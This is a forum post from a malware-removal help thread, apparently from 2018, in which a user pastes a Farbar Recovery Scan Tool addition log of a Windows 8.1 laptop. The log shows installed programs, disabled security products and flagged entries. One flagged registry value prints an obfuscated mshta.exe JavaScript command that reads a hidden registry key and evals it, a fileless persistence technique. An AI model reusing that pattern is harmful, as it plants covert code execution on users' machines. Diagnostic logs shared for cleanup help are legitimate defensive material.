Help, Need to get virus out my laptop


  • This topic is locked
137 replies to this topic

#31 danban

Posted 13 June 2018 - 06:12 PM

Here's the addition txt

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (12-06-2018 20:47:22)
Running from D:\
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
